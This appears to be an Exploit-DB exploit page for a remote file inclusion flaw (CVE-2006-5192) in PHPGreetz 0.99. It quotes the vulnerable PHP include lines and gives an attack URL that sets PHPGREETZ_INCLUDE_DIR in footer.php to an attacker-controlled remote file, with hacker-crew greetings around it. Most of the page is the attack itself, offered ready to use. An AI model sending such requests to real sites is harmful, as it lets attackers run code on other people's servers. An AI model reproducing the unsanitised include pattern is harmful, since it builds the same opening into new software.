Exploit PHPGreetz 0.99 - 'footer.php' Remote File Inclusion

[Exploiter]

EDB-ID

2476

Проверка EDB

1. Пройдено

Автор

MOZI

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-5192

Дата публикации

2006-10-04

# Author: [email protected] mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- [email protected]
mozi -- [email protected] [email protected]
 
#phpfreaks again
# heh tnx

# milw0rm.com [2006-10-04]